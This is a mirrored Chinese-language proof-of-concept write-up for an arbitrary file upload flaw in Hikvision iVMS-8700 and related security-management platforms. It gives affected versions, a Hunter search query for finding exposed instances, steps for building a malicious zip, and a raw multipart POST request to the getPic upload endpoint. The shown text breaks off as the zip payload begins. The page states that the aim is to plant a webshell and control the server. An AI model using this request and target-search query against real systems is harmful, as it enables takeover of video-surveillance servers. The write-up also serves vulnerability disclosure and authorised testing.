mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 03:17:07 +00:00
85 lines
4.3 KiB
Markdown
85 lines
4.3 KiB
Markdown
|
|
# 海康威视iVMS-8700综合安防管理平台 getPic任意文件上传
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。HIKVISION iVMS-8700综合安防管理平台存在任意文件上传漏洞,攻击者通过发送特定的请求包可以上传Webshell文件控制服务器。
|
|||
|
|
|
|||
|
|
# 二、影响版本
|
|||
|
|
+ 海康威视综合安防系统iVMS-5000
|
|||
|
|
+ 海康威视综合安防系统 iVMS-8700
|
|||
|
|
+ 海康威视综合安防系统iVMS-5200
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
+ hunter:`web.body="/views/home/file/installPackage.rar"`||`web.body="/home/locationIndex.action"`
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
+ 登录页面:
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
1.生成一个压缩文件,目录结构如下。
|
|||
|
|
|
|||
|
|
[output.zip](https://www.yuque.com/attachments/yuque/0/2024/zip/1622799/1709222237243-e5b9be7c-d2be-4914-a958-6913ff81ae5e.zip)
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
2. poc
|
|||
|
|
|
|||
|
|
```java
|
|||
|
|
POST /msp/home/upload.action;getPic?&type=ios HTTP/1.1
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
User-Agent: MicroMessenger
|
|||
|
|
Content-Type: multipart/form-data; boundary=00content0boundary00
|
|||
|
|
Host: xx.xx.xx.xx
|
|||
|
|
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
|
|||
|
|
Content-Length: 1288
|
|||
|
|
Connection: close
|
|||
|
|
|
|||
|
|
--00content0boundary00
|
|||
|
|
Content-Disposition: form-data; name="type"
|
|||
|
|
|
|||
|
|
ios
|
|||
|
|
--00content0boundary00
|
|||
|
|
Content-Disposition: form-data; name="file"; filename="stc.ipa"
|
|||
|
|
|
|||
|
|
PK |